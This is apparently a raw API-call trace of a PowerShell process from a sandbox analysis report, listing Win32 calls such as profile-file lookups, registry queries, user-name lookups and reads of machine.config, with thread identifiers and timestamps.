	[0758.841] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b8723b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0758.841] CoTaskMemFree (pv=0x1b8723b0) 
	[0758.841] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0758.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0758.844] SetErrorMode (uMode=0x1) returned 0x1
	[0758.844] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d9e0 | out: lpFileInformation=0x26d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0758.844] SetErrorMode (uMode=0x1) returned 0x1
	[0758.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0758.844] SetErrorMode (uMode=0x1) returned 0x1
	[0758.844] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d9e0 | out: lpFileInformation=0x26d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0758.844] SetErrorMode (uMode=0x1) returned 0x1
	[0758.844] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0758.845] SetErrorMode (uMode=0x1) returned 0x1
	[0758.845] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d9e0 | out: lpFileInformation=0x26d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0758.845] SetErrorMode (uMode=0x1) returned 0x1
	[0758.845] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0758.845] SetErrorMode (uMode=0x1) returned 0x1
	[0758.845] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d9e0 | out: lpFileInformation=0x26d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0758.845] SetErrorMode (uMode=0x1) returned 0x1
	[0758.848] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0758.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.848] CoTaskMemFree (pv=0x444b50) 
	[0758.850] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0758.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.850] CoTaskMemFree (pv=0x444b50) 
	[0758.852] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0758.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.852] CoTaskMemFree (pv=0x444b50) 
	[0758.855] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0758.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.855] CoTaskMemFree (pv=0x444b50) 
	[0758.859] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0758.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.860] CoTaskMemFree (pv=0x444b50) 
	[0758.860] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x308
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e8
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3a4
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x330
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x340
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0758.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0758.864] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0758.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0758.864] CoTaskMemFree (pv=0x444b50) 
	[0758.869] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0758.870] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26dbc0 | out: lpMode=0x26dbc0) returned 1
	[0760.379] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0760.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.379] CoTaskMemFree (pv=0x444b50) 
	[0760.381] SetEvent (hEvent=0x3a4) returned 1
	[0760.381] SetEvent (hEvent=0x308) returned 1
	[0760.381] SetEvent (hEvent=0x3a0) returned 1
	[0760.381] SetEvent (hEvent=0x2e8) returned 1
	[0760.383] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0760.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.383] CoTaskMemFree (pv=0x444b50) 
	[0760.383] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d918 | out: phkResult=0x26d918*=0x358) returned 0x0
	[0760.383] RegQueryValueExW (in: hKey=0x358, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d89c, lpData=0x0, lpcbData=0x26d898*=0x0 | out: lpType=0x26d89c*=0x0, lpData=0x0, lpcbData=0x26d898*=0x0) returned 0x2
	[0973.296] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d9a8 | out: phkResult=0x26d9a8*=0x40c) returned 0x0
	[0973.296] RegQueryValueExW (in: hKey=0x40c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d92c, lpData=0x0, lpcbData=0x26d928*=0x0 | out: lpType=0x26d92c*=0x0, lpData=0x0, lpcbData=0x26d928*=0x0) returned 0x2
	[0977.249] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0977.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0977.249] CoTaskMemFree (pv=0x445e70) 
	[0982.149] SetEvent (hEvent=0x30c) returned 1
	[0982.150] CoTaskMemAlloc (cb=0x804) returned 0x1cc7a890
	[0982.150] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1cc7a890, nSize=0x26da48 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26da48) returned 0x1
	[0982.150] CoTaskMemFree (pv=0x1cc7a890) 
	[0982.151] CoTaskMemAlloc (cb=0x204) returned 0x4484b0
	[0982.151] GetUserNameW (in: lpBuffer=0x4484b0, pcbBuffer=0x26da88 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26da88) returned 1
	[0982.151] CoTaskMemFree (pv=0x4484b0) 
	[0982.151] ReportEventW (hEventLog=0x1b970008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eebcb8*="Stopped", lpRawData=0x2eeba48) returned 1
	[0982.542] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
	[0983.279] CoGetContextToken (in: pToken=0x26f610 | out: pToken=0x26f610) returned 0x0
	[0983.279] CObjectContext::QueryInterface () returned 0x0
	[0983.280] CObjectContext::GetCurrentThreadType () returned 0x0
	[0983.280] Release () returned 0x0

Thread:
	id = 324
	os_tid = 0xfc4


Thread:
	id = 331
	os_tid = 0xff4


Thread:
	id = 1143
	os_tid = 0x3ac


Thread:
	id = 1147
	os_tid = 0x1a68


Thread:
	id = 1157
	os_tid = 0x15a4


Thread:
	id = 1166
	os_tid = 0x12ec


Thread:
	id = 1169
	os_tid = 0x13ec

	[0588.624] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.050] RegCloseKey (hKey=0x304) returned 0x0
	[0642.051] RegCloseKey (hKey=0x30c) returned 0x0
	[0642.051] RegCloseKey (hKey=0x308) returned 0x0
	[0695.688] LocalFree (hMem=0x3b7360) returned 0x0
	[0695.688] RegCloseKey (hKey=0x2e8) returned 0x0
	[0695.688] LocalFree (hMem=0x3b7310) returned 0x0
	[0695.688] CloseHandle (hObject=0x308) returned 1
	[0695.689] CloseHandle (hObject=0x13) returned 1
	[0695.691] CloseHandle (hObject=0xf) returned 1
	[0725.254] RegCloseKey (hKey=0x308) returned 0x0
	[0746.777] RegCloseKey (hKey=0x3b4) returned 0x0
	[0746.778] RegCloseKey (hKey=0x394) returned 0x0
	[0746.778] RegCloseKey (hKey=0x390) returned 0x0
	[0746.778] RegCloseKey (hKey=0x38c) returned 0x0
	[0746.778] RegCloseKey (hKey=0x388) returned 0x0
	[0746.779] RegCloseKey (hKey=0x384) returned 0x0
	[0746.779] RegCloseKey (hKey=0x380) returned 0x0
	[0746.779] RegCloseKey (hKey=0x37c) returned 0x0
	[0746.779] RegCloseKey (hKey=0x354) returned 0x0
	[0746.780] RegCloseKey (hKey=0x3b0) returned 0x0
	[0746.780] RegCloseKey (hKey=0x3ac) returned 0x0
	[0746.780] RegCloseKey (hKey=0x374) returned 0x0
	[0746.780] RegCloseKey (hKey=0x370) returned 0x0
	[0746.781] RegCloseKey (hKey=0x36c) returned 0x0
	[0746.781] RegCloseKey (hKey=0x368) returned 0x0
	[0746.781] RegCloseKey (hKey=0x364) returned 0x0
	[0746.781] RegCloseKey (hKey=0x360) returned 0x0
	[0746.782] RegCloseKey (hKey=0x35c) returned 0x0
	[0746.782] RegCloseKey (hKey=0x358) returned 0x0
	[0746.782] RegCloseKey (hKey=0x3a8) returned 0x0
	[0746.782] RegCloseKey (hKey=0x348) returned 0x0
	[0746.783] RegCloseKey (hKey=0x344) returned 0x0
	[0746.783] RegCloseKey (hKey=0x340) returned 0x0
	[0746.783] RegCloseKey (hKey=0x33c) returned 0x0
	[0746.783] RegCloseKey (hKey=0x338) returned 0x0
	[0746.784] RegCloseKey (hKey=0x334) returned 0x0
	[0746.784] RegCloseKey (hKey=0x330) returned 0x0
	[0746.784] RegCloseKey (hKey=0x32c) returned 0x0
	[0746.784] RegCloseKey (hKey=0x3a4) returned 0x0
	[0746.785] RegCloseKey (hKey=0x2e8) returned 0x0
	[0746.785] RegCloseKey (hKey=0x308) returned 0x0
	[0746.785] RegCloseKey (hKey=0x3a0) returned 0x0
	[0746.785] RegCloseKey (hKey=0x39c) returned 0x0
	[0746.786] RegCloseKey (hKey=0x378) returned 0x0
	[0782.906] RegCloseKey (hKey=0x358) returned 0x0
	[0888.954] CertFreeCRLContext (pCrlContext=0x1b8b3760) returned 1
	[0888.955] CertFreeCRLContext (pCrlContext=0x1ccc40a0) returned 1
	[0888.955] CloseHandle (hObject=0x4c8) returned 1
	[0888.955] CertCloseStore (hCertStore=0x1b8ddd50, dwFlags=0x0) returned 1
	[0888.956] CertFreeCRLContext (pCrlContext=0x1b8b3760) returned 1
	[0888.956] CloseHandle (hObject=0x4b8) returned 1
	[0888.957] CloseHandle (hObject=0x4b4) returned 1
	[0888.957] CertFreeCRLContext (pCrlContext=0x1b8b37e0) returned 1
	[0888.957] CloseHandle (hObject=0x40c) returned 1
	[0888.958] CloseHandle (hObject=0x464) returned 1
	[0888.958] CloseHandle (hObject=0x408) returned 1
	[0888.959] CloseHandle (hObject=0x460) returned 1
	[0888.959] CloseHandle (hObject=0x398) returned 1
	[0888.959] CloseHandle (hObject=0x3b4) returned 1
	[0888.960] CloseHandle (hObject=0x394) returned 1
	[0888.960] CloseHandle (hObject=0x390) returned 1
	[0888.961] CloseHandle (hObject=0x38c) returned 1
	[0888.962] CloseHandle (hObject=0x380) returned 1
	[0888.962] CloseHandle (hObject=0x37c) returned 1
	[0888.962] CloseHandle (hObject=0x354) returned 1
	[0888.963] CloseHandle (hObject=0x3b0) returned 1
	[0888.963] CloseHandle (hObject=0x3ac) returned 1
	[0888.964] CloseHandle (hObject=0x370) returned 1
	[0888.964] CloseHandle (hObject=0x374) returned 1
	[0888.965] CertFreeCRLContext (pCrlContext=0x1ccc4020) returned 1
	[0888.965] CloseHandle (hObject=0x358) returned 1

Thread:
	id = 1213
	os_tid = 0xc38


Thread:
	id = 1559
	os_tid = 0x20b0

	[0761.367] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0761.373] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0761.378] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.378] CoTaskMemFree (pv=0x444b50) 
	[0761.380] VirtualQuery (in: lpAddress=0x1c7dd720, lpBuffer=0x1c7de5e0, dwLength=0x30 | out: lpBuffer=0x1c7de5e0*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0761.385] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.385] CoTaskMemFree (pv=0x444b50) 
	[0761.388] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.388] CoTaskMemFree (pv=0x444b50) 
	[0761.391] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.391] CoTaskMemFree (pv=0x444b50) 
	[0761.400] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.400] CoTaskMemFree (pv=0x444b50) 
	[0761.403] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.403] CoTaskMemFree (pv=0x444b50) 
	[0761.405] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0761.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0761.405] CoTaskMemFree (pv=0x444b50) 
	[0762.705] VirtualQuery (in: lpAddress=0x1c7dd9d0, lpBuffer=0x1c7de890, dwLength=0x30 | out: lpBuffer=0x1c7de890*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0762.706] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0762.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.706] CoTaskMemFree (pv=0x444b50) 
	[0762.709] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0762.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.709] CoTaskMemFree (pv=0x444b50) 
	[0762.709] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0762.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.709] CoTaskMemFree (pv=0x444b50) 
	[0762.710] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0762.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0762.711] CoTaskMemFree (pv=0x444b50) 
	[0763.639] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0763.639] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.639] CoTaskMemFree (pv=0x444b50) 
	[0764.813] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.813] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.813] CoTaskMemFree (pv=0x444b50) 
	[0764.815] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.815] CoTaskMemFree (pv=0x444b50) 
	[0764.816] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.816] CoTaskMemFree (pv=0x444b50) 
	[0764.819] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.819] CoTaskMemFree (pv=0x444b50) 
	[0764.821] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.821] CoTaskMemFree (pv=0x444b50) 
	[0764.822] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.823] CoTaskMemFree (pv=0x444b50) 
	[0764.824] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0764.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.824] CoTaskMemFree (pv=0x444b50) 
	[0765.064] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0765.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.064] CoTaskMemFree (pv=0x444b50) 
	[0768.624] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0768.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0768.624] CoTaskMemFree (pv=0x444b50) 
	[0768.628] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0768.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0768.628] CoTaskMemFree (pv=0x444b50) 
	[0769.694] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0769.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0769.694] CoTaskMemFree (pv=0x444b50) 
	[0769.698] CoTaskMemAlloc (cb=0x104) returned 0x444b50
	[0769.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x444b50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0769.698] CoTaskMemFree (pv=0x444b50) 
	[0807.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0807.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c7dd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0810.568] CoTaskMemAlloc (cb=0x20c) returned 0x1b873bc0
	[0810.568] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b873bc0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0810.568] CoTaskMemFree (pv=0x1b873bc0) 
	[0810.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7dd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0810.580] GetCurrentProcess () returned 0xffffffffffffffff
	[0810.580] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c7dd368 | out: TokenHandle=0x1c7dd368*=0x358) returned 1
	[0810.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c7dcfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0810.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd410 | out: lpFileInformation=0x1c7dd410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0811.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c7dcf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0811.665] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd3c0 | out: lpFileInformation=0x1c7dd3c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0813.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c7dcda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0813.591] SetErrorMode (uMode=0x1) returned 0x1
	[0813.591] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x374
	[0813.591] GetFileType (hFile=0x374) returned 0x1
	[0813.591] SetErrorMode (uMode=0x1) returned 0x1
	[0813.592] GetFileType (hFile=0x374) returned 0x1
	[0813.594] GetFileSize (in: hFile=0x374, lpFileSizeHigh=0x1c7dd3b8 | out: lpFileSizeHigh=0x1c7dd3b8*=0x0) returned 0x622a
	[0813.594] ReadFile (in: hFile=0x374, lpBuffer=0x2dfecc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c7dd2d8, lpOverlapped=0x0 | out: lpBuffer=0x2dfecc8*, lpNumberOfBytesRead=0x1c7dd2d8*=0x1000, lpOverlapped=0x0) returned 1
